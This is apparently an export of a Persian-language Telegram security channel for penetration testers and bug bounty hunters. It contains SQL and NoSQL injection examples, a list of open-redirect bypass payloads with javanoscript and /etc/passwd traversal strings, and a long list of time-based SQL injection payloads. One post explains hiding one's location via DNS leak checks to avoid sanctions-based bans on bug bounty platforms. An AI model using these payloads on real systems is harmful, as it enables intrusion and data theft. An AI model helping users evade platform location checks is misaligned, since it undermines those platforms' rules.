🔍 SQL vs NoSQL: 🔍
یکی از چالشهای مهم در تست نفوذ، شناخت دقیق نوع دیتابیس و استفاده از نقاط ضعف اون برای رسیدن به هدفه. دو نوع دیتابیس که بیشتر باهاشون سر و کار داریم، SQL و NoSQL هستن. امروز یه مقایسه سریع میکنیم و یه سری کوئری پرکاربرد رو هم معرفی میکنیم که توی حملات خیلی به درد میخوره.
🎯یک SQL: ساختارمند و قابل پیشبینی
و SQL مخفف "Structured Query Language" هست و برای دیتابیسهای رابطهای (Relational Databases) مثل MySQL، PostgreSQL، و SQL Server استفاده میشه. این نوع دیتابیسها با جداول و روابط بین اونها کار میکنن.
مثال کوئریهای پرکاربرد در SQL:
- استخراج داده:
- تزریق (SQL Injection):
اینجاست که SQLi به درد میخوره؛ وقتی میخوای از نقاط ضعف توی اعتبارسنجی ورودیها استفاده کنی.
🎯دو NoSQL: انعطافپذیر و مقیاسپذیر
و NoSQL یعنی "Not Only SQL" و برای دیتابیسهایی استفاده میشه که ساختار غیررابطهای دارن، مثل MongoDB، Cassandra، و CouchDB. این دیتابیسها معمولاً دادهها رو به شکل سند (Document) یا جفت کلید-مقدار (Key-Value) ذخیره میکنن.
مثال کوئریهای پرکاربرد در NoSQL:
- استخراج داده در MongoDB:
- تزریق (NoSQL Injection):
اینجا هم NoSQLi وقتی وارد میشه که دادهها بهدرستی اعتبارسنجی نمیشن و میتونیم با کوئریهای مخرب، دیتابیس رو فریب بدیم.
⚔️ مقایسه کلی:
- ساختار داده: SQL دادهها رو به صورت جداول ساختاریافته ذخیره میکنه، در حالی که NoSQL از ساختارهای منعطفتری مثل JSON و Key-Value استفاده میکنه.
- مقیاسپذیری: SQL معمولاً به صورت عمودی (افزایش قدرت سرور) مقیاسپذیره، ولی NoSQL به صورت افقی (اضافه کردن سرورهای بیشتر) مقیاسپذیره.
- انعطافپذیری: NoSQL توی کار با دادههای بزرگ و غیرساختاریافته بهتر عمل میکنه.
💡 نکته مهم برای تست نفوذ:
شناخت تفاوتها بین SQL و NoSQL، بهت کمک میکنه حملات تزریقی (SQLi و NoSQLi) رو دقیقتر و مؤثرتر پیادهسازی کنی. حواست باشه که همیشه قبل از هر حمله، نوع دیتابیس رو شناسایی کنی و از کوئری مناسب استفاده کنی.
مراقب باش! هکرهای موفق همیشه یک قدم جلوترن. 👀💻
#SQL #NoSQL #تست_نفوذ #امنیت_اطلاعات #Injection
🔔با ما همراه باشید
🌐Sec_Hint & Boost & Youtube
یکی از چالشهای مهم در تست نفوذ، شناخت دقیق نوع دیتابیس و استفاده از نقاط ضعف اون برای رسیدن به هدفه. دو نوع دیتابیس که بیشتر باهاشون سر و کار داریم، SQL و NoSQL هستن. امروز یه مقایسه سریع میکنیم و یه سری کوئری پرکاربرد رو هم معرفی میکنیم که توی حملات خیلی به درد میخوره.
🎯
مثال کوئریهای پرکاربرد در SQL:
- استخراج داده:
SELECT * FROM users WHERE username = 'admin';
- تزریق (SQL Injection):
SELECT * FROM users WHERE username = 'admin' --' AND password = 'password';
اینجاست که SQLi به درد میخوره؛ وقتی میخوای از نقاط ضعف توی اعتبارسنجی ورودیها استفاده کنی.
🎯
مثال کوئریهای پرکاربرد در NoSQL:
- استخراج داده در MongoDB:
db.users.find({ "username": "admin" });
- تزریق (NoSQL Injection):
db.users.find({ "username": { $ne: null }, "password": { $ne: null } });
اینجا هم NoSQLi وقتی وارد میشه که دادهها بهدرستی اعتبارسنجی نمیشن و میتونیم با کوئریهای مخرب، دیتابیس رو فریب بدیم.
⚔️ مقایسه کلی:
- ساختار داده: SQL دادهها رو به صورت جداول ساختاریافته ذخیره میکنه، در حالی که NoSQL از ساختارهای منعطفتری مثل JSON و Key-Value استفاده میکنه.
- مقیاسپذیری: SQL معمولاً به صورت عمودی (افزایش قدرت سرور) مقیاسپذیره، ولی NoSQL به صورت افقی (اضافه کردن سرورهای بیشتر) مقیاسپذیره.
- انعطافپذیری: NoSQL توی کار با دادههای بزرگ و غیرساختاریافته بهتر عمل میکنه.
💡 نکته مهم برای تست نفوذ:
شناخت تفاوتها بین SQL و NoSQL، بهت کمک میکنه حملات تزریقی (SQLi و NoSQLi) رو دقیقتر و مؤثرتر پیادهسازی کنی. حواست باشه که همیشه قبل از هر حمله، نوع دیتابیس رو شناسایی کنی و از کوئری مناسب استفاده کنی.
مراقب باش! هکرهای موفق همیشه یک قدم جلوترن. 👀💻
#SQL #NoSQL #تست_نفوذ #امنیت_اطلاعات #Injection
🔔با ما همراه باشید
🌐Sec_Hint & Boost & Youtube
🔥14👍5
📦تا حالا با Hack The Box چالش داشتید؟
https://youtu.be/M36ziYBhTuE?si=X88GECR5j0b_Np0K
#YouTube #HackTheBox
از این مدل ویدیو ها مفیده براتون ؟
🔔با ما همراه باشید
🌐Sec_Hint & Boost & Youtube
https://youtu.be/M36ziYBhTuE?si=X88GECR5j0b_Np0K
#YouTube #HackTheBox
از این مدل ویدیو ها مفیده براتون ؟
🔔با ما همراه باشید
🌐Sec_Hint & Boost & Youtube
YouTube
کشف دنیای هکینگ با Hack The Box: از صفر تا صد
آیا میخواهید دنیای هکینگ را کشف کنید؟ در این ویدیو، به شما نشان میدهیم که چگونه با استفاده از پلتفرم Hack The Box، میتوانید اولین قدمهای خود را در این حوزه بردارید. ما به صورت کامل به معرفی محیط کاربری سایت و راه اندازی اولین ماشین مجازی میپردازیم.
…
…
❤12👍4🔥1
⚡️اگر مطالبمون براتون مفید هست میشه بوستمون کنید؟
6 تا دیگه میخوایم😍
https://news.1rj.ru/str/boost/sec_hint
6 تا دیگه میخوایم😍
https://news.1rj.ru/str/boost/sec_hint
Telegram
Security hint
از این کانال حمایت کنید تا بتواند به قابلیتهای اضافی دسترسی پیدا کند.
👍13❤8
🚨 جلوگیری از بلاک شدن در پلتفرمهای باگ بانتی با استفاده از DNS Leak Test
همونطور که میدونید، پلتفرمهای باگبانتی مثل HackerOne و Bugcrowd ایران رو تحریم کردند و اگه بفهمند شما ایرانی هستید، ممکنه حسابتون رو بلاک کنند و دسترسی به تمام بانتیها از بین بره. یکی از راههای شناسایی مکان کاربر از طریق DNS هست.
🔍 راه حل: تست نشت DNS
حتی اگر از VPN استفاده کنید، ممکنه درخواستهای DNS شما به طور مستقیم از سمت سرور VPN عبور نکنه و به سرورهای دیگه نشت کنه. این نشت میتونه موقعیت واقعی شما رو فاش کنه و باعث بلاک شدن حسابتون بشه.
🔑 چطوری بفهمیم VPN ما نشت DNS داره؟
۱. به VPN متصل بشید.
۲. به سایت dnsleaktest.com برید.
۳. روی "Extended Test" کلیک کنید.
۴. نتایج رو بررسی کنید؛ اگر سرورهای DNS با کشور VPN شما هماهنگ نبودن، یعنی نشت DNS دارید!
🛡 راهکار: اگر نشت DNS داشتید، تنظیمات VPN رو بررسی کنید یا VPN معتبرتری رو استفاده کنید تا موقعیت شما امن باقی بمونه.
با این روش، میتونید از شناسایی شدن و بلاک شدن حسابتون در پلتفرمهای باگبانتی جلوگیری کنید. 🚫🔒
#باگ_بانتی #امنیت_وب #DNSLeak #حریم_خصوصی #VPN #باگ_هانتینگ #هک #امنیت
🔔با ما همراه باشید
🌐Sec_Hint & Boost & Youtube
همونطور که میدونید، پلتفرمهای باگبانتی مثل HackerOne و Bugcrowd ایران رو تحریم کردند و اگه بفهمند شما ایرانی هستید، ممکنه حسابتون رو بلاک کنند و دسترسی به تمام بانتیها از بین بره. یکی از راههای شناسایی مکان کاربر از طریق DNS هست.
🔍 راه حل: تست نشت DNS
حتی اگر از VPN استفاده کنید، ممکنه درخواستهای DNS شما به طور مستقیم از سمت سرور VPN عبور نکنه و به سرورهای دیگه نشت کنه. این نشت میتونه موقعیت واقعی شما رو فاش کنه و باعث بلاک شدن حسابتون بشه.
🔑 چطوری بفهمیم VPN ما نشت DNS داره؟
۱. به VPN متصل بشید.
۲. به سایت dnsleaktest.com برید.
۳. روی "Extended Test" کلیک کنید.
۴. نتایج رو بررسی کنید؛ اگر سرورهای DNS با کشور VPN شما هماهنگ نبودن، یعنی نشت DNS دارید!
🛡 راهکار: اگر نشت DNS داشتید، تنظیمات VPN رو بررسی کنید یا VPN معتبرتری رو استفاده کنید تا موقعیت شما امن باقی بمونه.
با این روش، میتونید از شناسایی شدن و بلاک شدن حسابتون در پلتفرمهای باگبانتی جلوگیری کنید. 🚫🔒
#باگ_بانتی #امنیت_وب #DNSLeak #حریم_خصوصی #VPN #باگ_هانتینگ #هک #امنیت
🔔با ما همراه باشید
🌐Sec_Hint & Boost & Youtube
🔥12👍5👎2😁1👻1
⁉️تا حالا شده توی هکروان برای خوندن یک گزارش درمورد اسیب پذیری خاص کلی بگردید؟
توی این ریپو گزارشات (reports) هکروان رو براساس نوع اسیب پذیری دسته بندی کرده و اینطوری ساده تر دسترسی دارید.
nored0x.github.io/penetration%20testing/writeups-Bug-Bounty-hackrone/
#hackerOne #reports #writeup
🔔با ما همراه باشید
🌐Sec_Hint & Boost & Youtube
توی این ریپو گزارشات (reports) هکروان رو براساس نوع اسیب پذیری دسته بندی کرده و اینطوری ساده تر دسترسی دارید.
nored0x.github.io/penetration%20testing/writeups-Bug-Bounty-hackrone/
#hackerOne #reports #writeup
🔔با ما همراه باشید
🌐Sec_Hint & Boost & Youtube
NoRed0x
Writeups Bug Bounty hackerone
Information Disclosure
🔥15❤7👍1
🔥 ریپازیتوری Vulhub: یک ابزار قدرتمند برای شناخت کد های اسیب پذیر 🔥
💡 اگر به دنبال یک پلتفرم برای شبیهسازی آسیبپذیریهای واقعی هستید، Vulhub یک انتخاب فوقالعاده است. با استفاده از Docker-Compose، شما میتونید بدون نیاز به دانش عمیق از Docker، محیطهایی با آسیبپذیریهای متنوع مثل RCE و SQL Injection راهاندازی کنید.
⚙️ مزایا:
- شبیهسازی حملات در محیط امن
- یادگیری نحوه اکسپلویت آسیبپذیریها
- ابزار ارزشمند برای آموزش و تست عملی
🔗 مشاهده ریپازیتوری Vulhub
⚔️ سطح خودت رو ارتقا بده!
#Pentesting #BugBounty #Vulhub #CyberSecurity #Docker
🔔با ما همراه باشید
🌐Sec_Hint & Boost & Youtube
💡 اگر به دنبال یک پلتفرم برای شبیهسازی آسیبپذیریهای واقعی هستید، Vulhub یک انتخاب فوقالعاده است. با استفاده از Docker-Compose، شما میتونید بدون نیاز به دانش عمیق از Docker، محیطهایی با آسیبپذیریهای متنوع مثل RCE و SQL Injection راهاندازی کنید.
⚙️ مزایا:
- شبیهسازی حملات در محیط امن
- یادگیری نحوه اکسپلویت آسیبپذیریها
- ابزار ارزشمند برای آموزش و تست عملی
🔗 مشاهده ریپازیتوری Vulhub
⚔️ سطح خودت رو ارتقا بده!
#Pentesting #BugBounty #Vulhub #CyberSecurity #Docker
🔔با ما همراه باشید
🌐Sec_Hint & Boost & Youtube
👍13❤5
🎞و ویدیو ی این هفته چنل یوتیوبمون؟!
چقدر با sql injection اشنایی دارید؟
https://youtu.be/xlq0anqJRWw?si=tZzBn6AQsJpfPJCg
#YouTube #Sql_Injection #sqli
🔔با ما همراه باشید
🌐Sec_Hint & Boost & Youtube
چقدر با sql injection اشنایی دارید؟
https://youtu.be/xlq0anqJRWw?si=tZzBn6AQsJpfPJCg
#YouTube #Sql_Injection #sqli
🔔با ما همراه باشید
🌐Sec_Hint & Boost & Youtube
YouTube
هک وبسایت با SQL Injection (برای مبتدیها و حرفهایها)
در این ویدیو، به صورت کامل و کاربردی با مفهوم SQL Injection آشنا می شوید. یاد میگیرید که چگونه از این آسیب پذیری سوء استفاده کنید و چگونه از وب سایت خود در برابر آن محافظت کنید. این آموزش برای مبتدیان و افرادی که به امنیت وب علاقه دارند بسیار مفید است.
↢Social…
↢Social…
👍18❤3
🎙 Critical Thinking - Bug Bounty Podcast 🎙
اگه به فکر ورود به دنیای باگبانتی تماموقت هستی، این پادکست دقیقاً برای تو ساخته شده! توی هر قسمت، نکات کلیدی و تجربههای واقعی درباره چالشها و فرصتهای این مسیر رو یاد میگیری. از نحوه تغییر شغل سنتی به باگ بانتی تا راهکارهای موفقیت،چالشها، شرایط لازم، و یه نقشه راه کامل برای گذر از این مسیر توضیح داده شده!
🔗 برای گوش دادن: Critical Thinking Podcast
#BugBounty #امنیت_سایبری #پادکست
🔔با ما همراه باشید
🌐Sec_Hint & Boost & Youtube
اگه به فکر ورود به دنیای باگبانتی تماموقت هستی، این پادکست دقیقاً برای تو ساخته شده! توی هر قسمت، نکات کلیدی و تجربههای واقعی درباره چالشها و فرصتهای این مسیر رو یاد میگیری. از نحوه تغییر شغل سنتی به باگ بانتی تا راهکارهای موفقیت،چالشها، شرایط لازم، و یه نقشه راه کامل برای گذر از این مسیر توضیح داده شده!
🔗 برای گوش دادن: Critical Thinking Podcast
#BugBounty #امنیت_سایبری #پادکست
🔔با ما همراه باشید
🌐Sec_Hint & Boost & Youtube
❤11👍1
💡 ترفندهای موثر برای بایپس Open Redirect
اگه با Open Redirect سر و کار داری، این ترفندها میتونن بهت کمک کنن تا بایپسهای موثری ایجاد کنی:
1. تزریق Null-byte
2. رمزگذاری Base64
3. تغییر حساس به حروف بزرگ و کوچک
4. رشتههای UTF-8 بیش از حد طولانی
5. روشهای ترکیبی رمزگذاری
6. روشهای مختلف نوشتن دامنه
7. کاراکترهای خاص در انتها
8. فرمت هشتگانه آدرس IP
9. انواع آدرسهای IP
10. مسیریابی با رمزگذاری
11. استفاده از پروتکلهای جایگزین
12. آدرسهای پروتکل نسبی
13. موارد لبه در ریدایرکتها
14. نوشتار IPv6
15. دو بار رمزگذاری آدرس URL
16. ترکیب مسیردهی و رمزگذاری
17. ردیابی DNS معکوس
18. پورتهای غیرمعمول
19. مبهمسازی مسیر با Unicode
20. مبهمسازی پارامترهای Query
21. استفاده از نماد @ برای userinfo
22. ترکیب userinfo و مسیردهی
#OpenRedirect #BugBounty #PenTesting #CyberSecurity
🔔با ما همراه باشید
🌐Sec_Hint & Boost & Youtube
اگه با Open Redirect سر و کار داری، این ترفندها میتونن بهت کمک کنن تا بایپسهای موثری ایجاد کنی:
1. تزریق Null-byte
- /google.com%00/
- //google.com%00
2. رمزگذاری Base64
- aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbQ==
- //base64:d3d3Lmdvb2dsZS5jb20=/
3. تغییر حساس به حروف بزرگ و کوچک
- //GOOGLE.com/
- //GoOgLe.com/
4. رشتههای UTF-8 بیش از حد طولانی
- %C0%AE%C0%AE%2F
- %C0%AF%C0%AF%2F%2Fgoogle.com
5. روشهای ترکیبی رمزگذاری
- /%68%74%74%70://google.com
- //base64:%32%46%32%46%67%6F%6F%67%6C%65%2E%63%6F%6D
6. روشهای مختلف نوشتن دامنه
- //google.com@127.0.0.1/
- //127.0.0.1.xip.io/
7. کاراکترهای خاص در انتها
- //google.com/#/
- //google.com/;&/
8. فرمت هشتگانه آدرس IP
- http://0177.0.0.1/
- http://00177.0000.0000.0001/
9. انواع آدرسهای IP
- http://3232235777
- http://0xC0A80001
10. مسیریابی با رمزگذاری
- /..%252f..%252f..%252fetc/passwd
- /%252e%252e/%252e%252e/%252e%252e/etc/passwd
11. استفاده از پروتکلهای جایگزین
- ftp://google.com/
- javanoscript:alert(1)//google.com
12. آدرسهای پروتکل نسبی
- :////google.com/
- :///google.com/
13. موارد لبه در ریدایرکتها
- //google.com/?q=//bing.com/
- //google.com?q=https://another-site.com/
14. نوشتار IPv6
- http://[::1]/
- http://[::ffff:192.168.1.1]/
15. دو بار رمزگذاری آدرس URL
- %252f%252fgoogle.com
- %255cgoogle.com
16. ترکیب مسیردهی و رمزگذاری
- /%2E%2E/%2E%2E/etc/passwd
- /%2e%2e%5c%2e%2e/etc/passwd
17. ردیابی DNS معکوس
- https://google.com.reverselookup.com
- //lookup-reversed.google.com/
18. پورتهای غیرمعمول
- http://google.com:81/
- https://google.com:444/
19. مبهمسازی مسیر با Unicode
- /%E2%80%8Egoogle.com/
- /%C2%A0google.com/
20. مبهمسازی پارامترهای Query
- //google.com/?q=http://another-site.com/
- //google.com/?redirect=https://google.com/
21. استفاده از نماد @ برای userinfo
- https://admin:password@google.com/
- http://@google.com
22. ترکیب userinfo و مسیردهی
https://admin:password@google.com/../../etc/passwd
#OpenRedirect #BugBounty #PenTesting #CyberSecurity
🔔با ما همراه باشید
🌐Sec_Hint & Boost & Youtube
❤16👍5
🚀جدیدترين و سریعترين DNS Resolver 🚀
یه ابزار فوقالعاده به نام SanicDNS توسط Hadrian معرفی شده که میتونه ۵ میلیون درخواست DNS در ثانیه رو پردازش کنه! 😲
سرعت این DNS Resolver خیلی بیشتر از ابزارهای قدیمی مثل MassDNS هست و بهخاطر عملکرد فوقالعاده سریعش در پردازش و پاسخ به درخواستها، میتونه برای تستهای امنیتی و عملکرد شبکه مفید باشه. ⚡️
🔗 جزئیات بیشتر و دریافت:
SanicDNS در GitHub
#DNS #SanicDNS #CyberSecurity #Pentesting #BugBounty
🔔با ما همراه باشید
🌐Sec_Hint & Boost & Youtube
یه ابزار فوقالعاده به نام SanicDNS توسط Hadrian معرفی شده که میتونه ۵ میلیون درخواست DNS در ثانیه رو پردازش کنه! 😲
سرعت این DNS Resolver خیلی بیشتر از ابزارهای قدیمی مثل MassDNS هست و بهخاطر عملکرد فوقالعاده سریعش در پردازش و پاسخ به درخواستها، میتونه برای تستهای امنیتی و عملکرد شبکه مفید باشه. ⚡️
🔗 جزئیات بیشتر و دریافت:
SanicDNS در GitHub
#DNS #SanicDNS #CyberSecurity #Pentesting #BugBounty
🔔با ما همراه باشید
🌐Sec_Hint & Boost & Youtube
👍14🤩3
🎞اگر تا حالا با SQLmap کار نکردید یا نمیدونید از UNION attack چطوری میشه استفاده کرد پیشنهاد میکنم ویدیو این هفته چنل یویتوب رو حتما ببینید😍
https://youtu.be/J9iYUNX3TV4?si=hcI-N772KvH3MlSe
#Youtube #sqlmap #sql_injection
🔔با ما همراه باشید
🌐Sec_Hint & Boost & Youtube
https://youtu.be/J9iYUNX3TV4?si=hcI-N772KvH3MlSe
#Youtube #sqlmap #sql_injection
🔔با ما همراه باشید
🌐Sec_Hint & Boost & Youtube
🔥13👍4
سلام به همراهان عزیزم😍
برای ادامه مسیر خوشحال میشم باهم تعامل داشته باشیم چه در کپشن اینجا چه در کامنت های یوتیوب، برام بنویسید و بگید:
چقدر براتون این ویدیو ها مفید بوده🤩
از چه چیزی خوشتون اومده و دوست داشتید و از چه چیزی خوشتون نیومده 🤔
و مثل همیشه مرسی که هستید❤️
برای ادامه مسیر خوشحال میشم باهم تعامل داشته باشیم چه در کپشن اینجا چه در کامنت های یوتیوب، برام بنویسید و بگید:
چقدر براتون این ویدیو ها مفید بوده🤩
از چه چیزی خوشتون اومده و دوست داشتید و از چه چیزی خوشتون نیومده 🤔
و مثل همیشه مرسی که هستید❤️
❤23👍2
🚨 Time-Based SQL Injection Payloads 🚨
این لیست شامل Payloadهای مختلف برای اجرای حملات SQL Injection با استفاده از تأخیر زمانی است. این روش به شما کمک میکند تا آسیبپذیریهای زمانمحور را در دیتابیسهای مختلف مثل MySQL، PostgreSQL و MSSQL شناسایی کنید.
🔹 چند نمونه از Payloadها:
⚠️ توجه: تمامی payloadها را برای تست امنیتی هدفمند استفاده کنید و از آنها در محیطهای قانونی بهره ببرید.
#SQLi #Injection #TimeBased #Security
🔔با ما همراه باشید
🌐Sec_Hint & Boost & Youtube
این لیست شامل Payloadهای مختلف برای اجرای حملات SQL Injection با استفاده از تأخیر زمانی است. این روش به شما کمک میکند تا آسیبپذیریهای زمانمحور را در دیتابیسهای مختلف مثل MySQL، PostgreSQL و MSSQL شناسایی کنید.
🔹 چند نمونه از Payloadها:
timebased payloads for different dbms:
XOR(if(now()=sysdate(),sleep(7),0))XOR%23
'or sleep(7)--#
'or sleep(7)#
'or sleep(7)='#
'or sleep(7)='--
'/*F*/or/*F*/sleep(7)='
'or sleep(7)--%23
'or sleep(7)%23
'or sleep(7);%00
or sleep(7)--+-
or sleep(7)#
'/*f*/or/*f*/sleep/*f*/(7)--#
'/*f*/or/*f*/sleep/*f*/(7)#
or sleep(7)%23
'/*f*/or/*f*/sleep/*f*/(7)--%23
'/*f*/or/*f*/sleep/*f*/(7)%23
'/*f*/or/*f*/sleep/*f*/(7);%00
or/*f*/sleep/*f*/(7)--+-
or/*f*/sleep/*f*/(7)#
'XOR(if(now()=sysdate(),sleep(7),0))XOR'
'OR(if(now()=sysdate(),sleep(7),0))--#
'OR(if(now()=sysdate(),sleep(7),0))#
or/*f*/sleep/*f*/(7)%23
'OR(if(now()=sysdate(),sleep(7),0))--%23
'OR(if(now()=sysdate(),sleep(7),0))%23
'OR(if(now()=sysdate(),sleep(7),0));%00
OR(if(now()=sysdate(),sleep(7),0))--+-
OR(if(now()=sysdate(),sleep(7),0))#
OR(if(now()=sysdate(),sleep(7),0))%23
'WAITFORDELAY'0:0:7';%00
'WAITFORDELAY'0:0:7'#
'WAITFORDELAY'0:0:7'%23
'WAITFORDELAY'0:0:7';%00
WAITFORDELAY'0:0:7'#
WAITFORDELAY'0:0:7'%23
WAITFORDELAY'0:0:7'--+-
'WAITFORDELAY'0:0:7'--+-
'WAITFORDELAY'0:0:7'='
\/*F*/or/*f*/sleep(7)%23
'/*f*/OR/*f*/pg_sleep(7)#
'/*f*/OR/*f*/pg_sleep(7)%23
'/*f*/OR/*f*/pg_sleep(7);%00
/*f*/OR/*f*/pg_sleep(70)--+-
/*f*/OR/*f*/pg_sleep(70)#
/*f*/OR/*f*/pg_sleep(70)%23
'/*f*/OR/*f*/pg_sleep(7)=';%00
\)/*F*/or/*f*/sleep(7)%23
\)/*F*/or/*f*/sleep(7)%23
%E2%84%A2%27/*F*/or/*f*/sleep(7)%23
%E2%84%A2%27/*F*/or/*f*/pg_sleep(7)%23
%E2%84%A2%22/*F*/or/*f*/pg_sleep(7)%23
%E2%84%A2%22/*F*/or/*f*/sleep(7)%23
%E2%84%A2%22/*F*/or/*f*/sleep(7)--+-
%E2%84%A2\)/*F*/or/*f*/sleep(7)--+-
%E2%84%A2%27)/*F*/or/*f*/sleep(7)--+-
%E2%84%A2'/*F*/or/*f*/sleep(7)='
%E2%84%A2')/*F*/or/*f*/sleep(7)='
...
⚠️ توجه: تمامی payloadها را برای تست امنیتی هدفمند استفاده کنید و از آنها در محیطهای قانونی بهره ببرید.
#SQLi #Injection #TimeBased #Security
🔔با ما همراه باشید
🌐Sec_Hint & Boost & Youtube
❤12👍5👎1🤩1
🎯معرفی پلتفرم های CTF بر اساس سطح سختی 🎯
🟢 مبتدی:
🔗 picoCTF
🔗 TryHackMe
🔗 CTFlearn
🔗 Hacker101 CTF
🔗 LegitBS
🔗 OverTheWire
🔗 Crackmes.one
🔗 CyberTalents
🕳🕳🕳🕳🕳🕳🕳🕳🕳🕳🕳
🟡 سطح متوسط:
🔗 TryHackMe
🔗 Flare-On
🔗 CTFtime
🔗 Pwn College
🔗 OWASP WebGoat
🔗 PentesterLab
🔗 CMD Challenge
🔗 Hacksplaining
🕳🕳🕳🕳🕳🕳🕳🕳🕳🕳🕳
🔴 پیشرفته:
🔗 Hack The Box
🔗 root-me 🌟🌟
🔗 VulnHub 🌟🌟
🔗 Exploit Exercises
🔗 PortSwigger Web Security 🌟🌟
🔗 Challenges.re
🔗 CryptoHack
🔗 CryptoPals
🔗 Rubiya CTF
🕳🕳🕳🕳🕳🕳🕳🕳🕳🕳🕳
🟣 حرفهای:
🔗 UnderTheWire
🔗 AttackDefense
🔗 FBCTF GitHub Archive
🔗 Awesome CTF GitHub
🔗 Awesome CTF Resources GitHub
🔗 Guy in a Tuxedo GitHub
🔗 Pwn.tn
🔗 SmashTheStack
🕳🕳🕳🕳🕳🕳🕳🕳🕳🕳🕳
با هر سطحی که باشی، یکی از این پلتفرمها حتماً به کارت میاد! 🚀
#CTF #امنیت_سایبری #آموزش
🔔با ما همراه باشید
🌐Sec_Hint & Boost & Youtube
🟢 مبتدی:
🔗 picoCTF
🔗 TryHackMe
🔗 CTFlearn
🔗 Hacker101 CTF
🔗 LegitBS
🔗 OverTheWire
🔗 Crackmes.one
🔗 CyberTalents
🕳🕳🕳🕳🕳🕳🕳🕳🕳🕳🕳
🟡 سطح متوسط:
🔗 TryHackMe
🔗 Flare-On
🔗 CTFtime
🔗 Pwn College
🔗 OWASP WebGoat
🔗 PentesterLab
🔗 CMD Challenge
🔗 Hacksplaining
🕳🕳🕳🕳🕳🕳🕳🕳🕳🕳🕳
🔴 پیشرفته:
🔗 Hack The Box
🔗 root-me 🌟🌟
🔗 VulnHub 🌟🌟
🔗 Exploit Exercises
🔗 PortSwigger Web Security 🌟🌟
🔗 Challenges.re
🔗 CryptoHack
🔗 CryptoPals
🔗 Rubiya CTF
🕳🕳🕳🕳🕳🕳🕳🕳🕳🕳🕳
🟣 حرفهای:
🔗 UnderTheWire
🔗 AttackDefense
🔗 FBCTF GitHub Archive
🔗 Awesome CTF GitHub
🔗 Awesome CTF Resources GitHub
🔗 Guy in a Tuxedo GitHub
🔗 Pwn.tn
🔗 SmashTheStack
🕳🕳🕳🕳🕳🕳🕳🕳🕳🕳🕳
با هر سطحی که باشی، یکی از این پلتفرمها حتماً به کارت میاد! 🚀
#CTF #امنیت_سایبری #آموزش
🔔با ما همراه باشید
🌐Sec_Hint & Boost & Youtube
👍16❤6🔥2👏1
🚨 CSP Bypass - Content Security Policy (CSP) 🚨
🌐 سایت CSP Bypass مرجع عالی برای محققان امنیت، توسعهدهندگان و کارشناسان تست نفوذ است تا با روشهای دور زدن CSP آشنا شوند. CSP یکی از راههای مهم برای جلوگیری از حملات XSS است، اما اگر به درستی پیکربندی نشود، قابل دور زدن است.
🔧 با یادگیری تکنیکهای مختلف و بررسی سناریوهای عملی، میتوانید ضعفهای پیکربندی CSP را شناسایی کنید
#CSP #امنیت #XSS #Bypass
🔔با ما همراه باشید
🌐Sec_Hint & Boost & Youtube
🌐 سایت CSP Bypass مرجع عالی برای محققان امنیت، توسعهدهندگان و کارشناسان تست نفوذ است تا با روشهای دور زدن CSP آشنا شوند. CSP یکی از راههای مهم برای جلوگیری از حملات XSS است، اما اگر به درستی پیکربندی نشود، قابل دور زدن است.
🔧 با یادگیری تکنیکهای مختلف و بررسی سناریوهای عملی، میتوانید ضعفهای پیکربندی CSP را شناسایی کنید
#CSP #امنیت #XSS #Bypass
🔔با ما همراه باشید
🌐Sec_Hint & Boost & Youtube
❤6👍3
🎞اولین قدم در یادگیری لینوکس ستاپ کردن محیط اش هست.😎
و اولین قدم در حوزه امنیت یادگیری لینوکس هست⁉️
🤯میدونستید بدون ماشین مجازی میتونید داخل ویندوزتون لینوکس داشته باشید؟
https://youtu.be/alxPYBMWzIc?si=D5lZ3IyC5bzq7ZDO
#YouTube #Linux
🔔با ما همراه باشید
🌐Sec_Hint & Boost & Youtube
و اولین قدم در حوزه امنیت یادگیری لینوکس هست⁉️
🤯میدونستید بدون ماشین مجازی میتونید داخل ویندوزتون لینوکس داشته باشید؟
الان یکی میاد میگه چرا انقدر گفتی قشنگ توی ویدیو
https://youtu.be/alxPYBMWzIc?si=D5lZ3IyC5bzq7ZDO
#YouTube #Linux
🔔با ما همراه باشید
🌐Sec_Hint & Boost & Youtube
YouTube
Install WSL and Zsh for a Hacking Setup on Windows | Beginner's Guide to Linux for Web Security"
در این قسمت به مباحث اولیه برای ورود به دنیای لینوکس میپردازیم، از نصب WSL روی ویندوز گرفته تا آشنایی با توزیعهای مختلف لینوکس مثل Ubuntu، Kali Linux، و Fedora. همچنین، مروری خواهیم داشت بر دایرکتوریهای رایج در لینوکس مثل /bin، /etc، و /home و معرفی محیطهای…
❤12👍2🔥1
Security hint
🎞اولین قدم در یادگیری لینوکس ستاپ کردن محیط اش هست.😎 و اولین قدم در حوزه امنیت یادگیری لینوکس هست⁉️ 🤯میدونستید بدون ماشین مجازی میتونید داخل ویندوزتون لینوکس داشته باشید؟ الان یکی میاد میگه چرا انقدر گفتی قشنگ توی ویدیو https://youtu.be/alxPYBMWzIc?si…
سلام به دوستان عزیز
براتون مفیده این سری ویدیو رو کامل کنم یا خوب نیست و لازمه موضوع رو عوض کنیم ؟
براتون مفیده این سری ویدیو رو کامل کنم یا خوب نیست و لازمه موضوع رو عوض کنیم ؟
Anonymous Poll
68%
ادامه بده خیلی خوبه این موضوع
27%
نه بلدم برو یه موضوع دیگه
5%
توی کپشن میگم :)
This media is not supported in your browser
VIEW IN TELEGRAM
🔥 اکستنشن کروم برای استخراج اندپوینتها و URLها از فایلهای جاوااسکریپت 🔍
🔗و Extractifyیه اکستنشن جذاب برای کرومه که به طور خودکار اندپوینتها و URLها رو از فایلهای جاوااسکریپت پیدا میکنه. 📂✨ ویژگی خاص این ابزار اینه که دائم روی DOM سایت نظارت داره؛ یعنی اگر یه فایل جاوااسکریپت جدید به DOM اضافه بشه، بلافاصله اون رو اسکن و اطلاعات مورد نیاز رو استخراج میکنه.
🔧 مناسب برای تست نفوذ روی سایتهای مدرن مثل SPAها (مثل Next.js، React و ...)
#BugBounty #ChromeExtension #JavaScript #SPA
🔔با ما همراه باشید
🌐Sec_Hint & Boost & Youtube
🔗
🔧 مناسب برای تست نفوذ روی سایتهای مدرن مثل SPAها (مثل Next.js، React و ...)
#BugBounty #ChromeExtension #JavaScript #SPA
🔔با ما همراه باشید
🌐Sec_Hint & Boost & Youtube
❤14👍5👎1
Security hint
🎞اولین قدم در یادگیری لینوکس ستاپ کردن محیط اش هست.😎 و اولین قدم در حوزه امنیت یادگیری لینوکس هست⁉️ 🤯میدونستید بدون ماشین مجازی میتونید داخل ویندوزتون لینوکس داشته باشید؟ الان یکی میاد میگه چرا انقدر گفتی قشنگ توی ویدیو https://youtu.be/alxPYBMWzIc?si…
